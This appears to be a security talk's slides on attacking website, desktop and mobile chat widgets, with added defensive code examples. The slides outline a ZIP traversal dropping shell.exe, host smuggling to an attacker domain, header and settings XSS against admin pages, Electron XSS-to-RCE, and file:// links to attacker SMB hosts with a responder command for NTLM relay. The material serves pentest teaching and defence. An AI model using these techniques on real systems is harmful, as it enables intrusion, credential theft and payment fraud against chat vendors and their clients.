ZN Chats PDF
Agenda
Chats-Chats-Chats
How does it work?
ZIP old tricks
RCE via ZIP
So much XSS
Electron vulnerability
Scheme file:// for your chats
Payment through chats
Mobile Application Chats

Disclaimer
Chats-Chats-Chats
What are you talking about?
Another chat?
Chat Types
Browsers / CMS
Desktop Application
Mobile SDK
Social Networks
Does it help us? Pentest!
Increased attack surface
Social engineering attacks
Vulnerabilities in the customer's own implementation
Vendor vulnerabilities
User support sits on the local network
Lack of network segmentation
Chat for browsers. How does it work?
JavaScript
CMS = JS
JavaScript Privileges
XMLHttpRequest
Control of user data: cookies, tokens, sensitive information
HTML replacement
Remote update
Services
Files
Social engineering attacks?
Will you send an EXE file?
We can use a couple of stupid tricks with ZIP
ZIP Bomb
Hi @sergeybelove
42 Kb from 2014 :)
24 Gb? 322 Gb? 132 Tb? 4.5 Pb

ZIP Format

ZIP Traversal
Let's send a file
api.service.test -> storage.service.test
Sending the file: cat.png
cat.png == id
Concat('https://storage.service.test', file_path);
Download the file:
GET /file/id HTTP/1.1
Host: storage.service.test

RCE via File
Operator standalone program (user interface) <- api.service.test <- message
Message = file, file_path = ".hacke.site/file/id"
Concat('https://storage.service.test', file_path);
-> storage.service.test.hacke.site
Download the file:
GET /file/id HTTP/1.1
Host: storage.service.test.hacke.site
cat.png -> ../../../../../../../shell.exe == id
%Downloads%/shell.exe
XSS
XSS is the maximum impact
High level of message security
Not obvious places:
Headers
GET/POST parameters for analytics
Our target is the admin page or the statistics page

Headers for XSS
User-Agent
Referer
Cookie
Origin
Custom headers

Parameters for XSS
Methods: GET, POST, WebSocket
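The point of the two slides above is that message text is usually escaped well, while the request metadata that ends up on the statistics page (User-Agent, Referer, analytics parameters, custom headers) often is not. The following is an added example, not code from the talk: the raw-interpolation pattern beside an output-encoding version for a visitor row on an admin statistics page, with a separate rule for values that land in a URL context. The record shape, the length cap and the sample record are assumptions.

```javascript
// Added example (not from the talk): the statistics page renders request
// metadata (User-Agent, Referer, analytics parameters) that visitors control.
// Escape at output time; the record shape and functions are assumptions.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable pattern: raw interpolation of header values into admin HTML.
function renderVisitorRowUnsafe(rec) {
  return `<tr><td>${rec.ip}</td><td>${rec.userAgent}</td><td>${rec.referer}</td></tr>`;
}

// Hardened: every untrusted field is escaped and length-capped, so an oversized
// header cannot bloat the admin page either.
function renderVisitorRow(rec) {
  const cell = v => `<td>${escapeHtml(String(v ?? '').slice(0, 512))}</td>`;
  return `<tr>${cell(rec.ip)}${cell(rec.userAgent)}${cell(rec.referer)}</tr>`;
}

// Values bound for a URL context (e.g. a "back to referer" link) need URL rules
// as well as HTML escaping: only http(s) URLs become links.
function safeHrefAttr(value) {
  let url;
  try { url = new URL(String(value)); } catch { return '#'; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '#';
  return escapeHtml(url.href);
}

// Constructed sample record: the kind of line a chat analytics backend stores.
const SAMPLE = {
  ip: '203.0.113.7',
  userAgent: 'Mozilla/5.0 <script>probe()</script>',
  referer: 'javascript:probe()',
};
```

Escaping belongs at the output boundary regardless of where the value came from; the same row renderer should be used whether the record arrived through a GET parameter, a POST body or a WebSocket frame, since the slide lists all three as inputs.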
The sad consequences
XSS into chat settings
Appearance customisation: fonts, labels, color, image, etc.

Attack scheme 1
Evil Hacker -> pentest_client.shop.test -> statistic_vendor.chat.test, admin_vendor.chat.test
XSS attack on chat client admins
JS code injection into chat settings
pentest_client.shop.test: XSS from any user on the site

Attack scheme 2
Evil Hacker -> chat.vendor -> statistic.chat.vendor, admin.chat.vendor
XSS attack on chat vendor admins
JS code injection into chat settings
chat.vendor: XSS from any user on chat clients
-> statistic_vendor.chat.test, admin_vendor.chat.test, chat.test: all chat clients' services
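Both attack schemes end the same way: once someone with admin access to the chat settings is compromised, the appearance settings (fonts, labels, colour, image) become a stored injection point that is delivered to every visitor of every client site. The following is an added example, not code from the talk, showing allowlist validation of those settings before they are stored, and a CSS renderer that only ever sees validated values. The field names, the font allowlist and the image host are assumptions, not the vendor's schema; labels still need HTML escaping at render time, which this block does not repeat.

```javascript
// Added example (not from the talk): allowlist validation for the appearance
// settings a client admin can save (fonts, labels, colour, image). Field names
// and allowed values are assumptions, not the vendor's schema.
const FONT_ALLOWLIST = new Set(['Arial', 'Helvetica', 'Roboto', 'Open Sans']);
const IMAGE_HOSTS = new Set(['static.chat.vendor']);   // assumed CDN host

const RULES = {
  color: v => /^#[0-9a-fA-F]{6}$/.test(v),
  font: v => FONT_ALLOWLIST.has(v),
  label: v => v.length > 0 && v.length <= 64 && !/[\x00-\x1f<>]/.test(v),
  image: v => {
    try {
      const u = new URL(v);
      return u.protocol === 'https:' && IMAGE_HOSTS.has(u.hostname);
    } catch { return false; }
  },
};

// Returns the accepted settings and the list of rejected fields. Unknown keys are
// dropped: a setting the UI never shows is still rendered somewhere by someone.
function validateChatSettings(input) {
  const accepted = {}, rejected = [];
  for (const [key, value] of Object.entries(input || {})) {
    const rule = RULES[key];
    if (!rule) { rejected.push(`${key}: unknown field`); continue; }
    if (typeof value !== 'string' || !rule(value)) { rejected.push(`${key}: invalid value`); continue; }
    accepted[key] = value;
  }
  return { accepted, rejected };
}

// Rendering into CSS after validation: only validated values reach the stylesheet,
// so a "colour" of `red;background:url(...)` never becomes a CSS rule.
function renderWidgetCss(settings) {
  const { accepted } = validateChatSettings(settings);
  const rules = [];
  if (accepted.color) rules.push(`color:${accepted.color}`);
  if (accepted.font) rules.push(`font-family:"${accepted.font}"`);
  if (accepted.image) rules.push(`background-image:url("${accepted.image}")`);
  return `.chat-widget{${rules.join(';')}}`;
}
```

Validation on save is the first layer; the second is that the settings form itself should carry an anti-CSRF token (as the talk's protection list later says for the config form), since stored appearance settings are exactly what an attacker with a foothold in an admin's browser would try to change.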
Electron
Open-source framework to build desktop apps using HTML, CSS and JavaScript
Electron accomplishes this by combining Chromium and Node.js into a single runtime
Chat vendors use Electron for admin desktop applications

Electron Threat Model
Electron Threat Model = Browser Threat Model
Untrusted content from the web
SOP bypass
Control whether access to Node.js primitives is allowed from JavaScript
Potential access to Node.js primitives
Limited sandbox
XSS == RCE
https://doyensec.com/resources/us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf
https://blog.doyensec.com/2017/08/03/electron-framework-security.html

Electron sandbox bypass
nodeIntegration = true
Electron 1.6.7
Misconfiguration
SOP bypass via presence of privileged URLs
Switch to false
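The "XSS == RCE" line follows directly from the window configuration: with `nodeIntegration` on, any script injected into the admin window can `require('child_process')`. The following is an added example, not code from the talk or from Electron: a small audit of a `BrowserWindow`'s `webPreferences` object against that threat model, with the weak configuration the talk describes beside a hardened one. Only real Electron `webPreferences` keys are used; the policy itself (what counts as a finding) is this example's assumption. The Doyensec slides linked above describe Electronegativity, which performs this kind of check across a whole code base.

```javascript
// Added example (not from the talk): audit the webPreferences of an Electron
// BrowserWindow against the threat model above. Only real Electron keys are
// used; the policy thresholds are this example's assumptions.
// In the Electron 1.x line the talk discusses, nodeIntegration defaulted to
// true, so an absent key is treated as unsafe unless the caller states the
// version's default.
function auditWebPreferences(prefs, { nodeIntegrationDefault = true } = {}) {
  const p = prefs || {};
  const findings = [];
  const nodeIntegration = p.nodeIntegration ?? nodeIntegrationDefault;
  if (nodeIntegration) findings.push('nodeIntegration is on: any XSS in the window reaches Node (XSS == RCE)');
  if (p.nodeIntegrationInWorker) findings.push('nodeIntegrationInWorker is on: web workers reach Node as well');
  if (p.contextIsolation !== true) findings.push('contextIsolation is not enabled: page scripts share a world with the preload script');
  if (p.sandbox === false) findings.push('sandbox is off: the renderer runs outside the Chromium sandbox');
  if (p.webSecurity === false) findings.push('webSecurity is off: same-origin policy is disabled for this window');
  if (p.allowRunningInsecureContent) findings.push('allowRunningInsecureContent: http content loads into an https page');
  if (p.enableRemoteModule) findings.push('enableRemoteModule: the remote module exposes main-process objects');
  return { safe: findings.length === 0, findings };
}

// The admin window as the talk describes the weak configuration (assumed shape).
const WEAK_PREFS = { nodeIntegration: true, webSecurity: false };

// What a hardened window that only shows vendor web content should look like.
const HARDENED_PREFS = {
  nodeIntegration: false,
  nodeIntegrationInWorker: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
  allowRunningInsecureContent: false,
  enableRemoteModule: false,
};
```

Whatever the renderer loads from `admin.chat.vendor` is web content under the browser threat model, so it should get browser privileges; anything that genuinely needs Node belongs in the main process behind an explicit IPC surface.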
File://
Typically used to retrieve files from networks and local disks
Vulnerabilities in the wild: Local File Inclusion, XXE, SSRF
Windows context: NTLM hash stealing, NTLM relay, RCE

Chats with File://
Pentest in the local network
RCE on client devices and servers
Weak & duplicate passwords (local services, servers, client devices)
file://hacker.test/
SMB Relay

Tricks with File:// 1
What can we do?
File:// with local files
file://C:/Windows/System32/calc.exe
But we can't use arguments
file://C:/Windows/System32/cmd.exe /C calc
Every character in a file link is part of the path
It is only for social engineering attacks
You can combine this with the dir traversal ZIP trick

Tricks with File:// 2
File:// with executable files from the Internet (hacker SMB server)
file://internet_IP/pwn.exe

Chats with File://
Pentest Internet service and local network
RCE on client device (Admin OS)
Social engineering attacks + file://local_files

Tricks with File:// 3
The local network seen from Windows is servers with NetBIOS names
NetBIOS name - a domain name without a dot
If I use the NetBIOS name "netbios" instead of the local IP, I can bypass that alert
file://netbios/pwn.exe
How?
smbd (Samba) server + responder -d netbios -I eth0

Chats with File://
NetBIOS name trick in the local network
Without alert window (Admin OS)
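The three file:// tricks share one precondition: the chat client turns whatever scheme the sender typed into a clickable link, and the remaining defence is an OS warning dialog that the dotless NetBIOS name defeats. The following is an added example, not code from the talk: a link classifier for the chat server or operator client that allows only an explicit scheme allowlist, names UNC and drive-letter paths explicitly, and refuses dotless and private-address hosts instead of relying on the dialog. The allowlist and the private-range list are assumptions to adjust per deployment.

```javascript
// Added example (not from the talk): decide, on the chat server or in the
// operator client, whether a link in a message may be rendered as clickable.
// A scheme allowlist rejects file://, UNC and similar; dotless hosts (the
// NetBIOS-style names the talk shows bypassing the warning dialog) and private
// addresses are refused as well. Lists are assumptions.
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);
const PRIVATE_V4 = /^(10\.|127\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|169\.254\.|0\.)/;

function classifyLink(raw) {
  const text = String(raw).trim();
  // UNC paths and drive letters never parse as http(s); name them explicitly
  // so the reason is visible in logs.
  if (/^\\\\/.test(text) || /^[A-Za-z]:[\\/]/.test(text)) {
    return { allow: false, reason: 'local or UNC path' };
  }
  let url;
  try { url = new URL(text); } catch { return { allow: false, reason: 'not an absolute URL' }; }
  if (!ALLOWED_SCHEMES.has(url.protocol)) {       // covers file:, smb:, javascript:, FILE: ...
    return { allow: false, reason: `scheme ${url.protocol} not allowed` };
  }
  if (url.protocol === 'mailto:') return { allow: true, reason: 'mailto', href: url.href };
  const host = url.hostname;
  if (!host.includes('.') || host === 'localhost') {
    return { allow: false, reason: 'dotless or local host name' };
  }
  if (PRIVATE_V4.test(host)) return { allow: false, reason: 'private address' };
  return { allow: true, reason: 'ok', href: url.href };
}

// Render helper: the message text stays visible, only allowed links become anchors.
function linkify(text) {
  return String(text).replace(/\S+:\/\/\S+|\\\\\S+/g, m => {
    const c = classifyLink(m);
    return c.allow ? `<a href="${c.href}">${m}</a>` : m;
  });
}
```

Blocking outbound TCP 445 at the perimeter addresses the Internet SMB server case (trick 2); the local-network NetBIOS case (trick 3) is why this filter refuses dotless hosts rather than trusting the client's warning dialog. `linkify` above is deliberately simple and assumes its input has already been HTML-escaped.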
Hacker can buy an iPhone for free
Shop backend
POST /pay?params=1
shopId
customer
sum
item
Redirect to payment page

Stealing money for hackers
Protection:
Check Yandex IPs
Add anti-CSRF token for the config form
DO NOT SHOW ANY PASSWORDS EVER
Mobile Application SDK
Custom code for native applications
All code in the app runs with the same privileges in the mobile OS
Third-party code (SDKs) has full access inside your app:
Change the user interface
Access local files in the app folder
Access dynamic user data
Change app logic (e.g. tapjacking)
Vulnerabilities
Custom implementation
WebView JS manipulation (Android)
https://labs.mwrinfosecurity.com/blog/webview-addjavascriptinterface-remote-code-execution/
ExpensiveWall
ExpensiveWall is spread to different apps as an SDK called "gtk"
ExpensiveWall sends data about the infected device to its C&C server, including its location and unique identifiers, such as MAC and IP addresses, IMSI, and IMEI.
Total downloads of infected applications = 5,904,511
https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
Don't forget about
Farms that inflate application ratings
Dynamic code execution and code updates: JSPatch (iOS), Android Runtime
Legitimate ad SDKs that were vulnerable
Applications with fake (ad) SDKs
Code review of custom SDK code
Conclusion
For pentest and red team: increase your attack surface via 3rd party services and program libraries
For you and your project: think about how much you trust other people's implementations, applications on your devices, plugins in your programs
Don't forget about code review!

Questions? Or
Special THX to @cherboff and @barracud4_ @ShikariSenpai @_p4lex
Alexey Pertsev
Egor Karbutov